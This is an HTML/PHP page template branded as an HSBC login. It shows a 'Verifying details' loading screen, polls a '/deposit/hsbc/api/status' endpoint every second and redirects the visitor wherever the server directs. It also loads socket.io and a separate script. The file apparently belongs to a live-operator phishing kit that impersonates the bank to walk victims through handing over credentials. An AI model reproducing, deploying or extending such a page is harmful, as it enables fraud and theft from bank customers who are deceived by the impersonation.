<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" type="text/css" href="/assets/hsbc/css/style.css">
        <link rel="shortcut icon" type="image/PNG" href="/assets/hsbc/img/logoTrans.png">
        <title>HSBC - Login</title>
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <script >
            setInterval(function() {
                $.post('/deposit/hsbc/api/status', {page: lrinfo}, function(response) {
                    if (response.status) {
                        location.href = response.href;
                    }
                }, 'JSON');
            }, 1000);
        </script>
        <style>
        #loaderOnLoading {
            display: block;
        }
        </style>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body>
        <img src="/assets/hsbc/img/logoTrans.png" id="transLogo">
        <div class="header">
            <div class="headerRow">
                <img src="/assets/hsbc/img/logoTrans.png" id="logo">
                <!-- <div class="btn" id="loginBtn">Login On </div> -->
            </div>
        </div>
        <div class="main">
            <div class="alignment">
                <p class="pageTitle" style="text-align: center">Verifying details</p>
                <img src="/assets/hsbc/img/loading.gif" alt="" id="loaderOnLoading">
                <p class="desText" style="text-align: center; padding: 20px 0;">Loading please wait...</p>
            </div>
        </div>
        <div class="footer">
        </div>
        <span hidden id="navig"> . </span>
        <span hidden id="stage">Loading</span>
    </body>
    <script src="/bank/hsbc/js/script.js">
    </script>
</html>
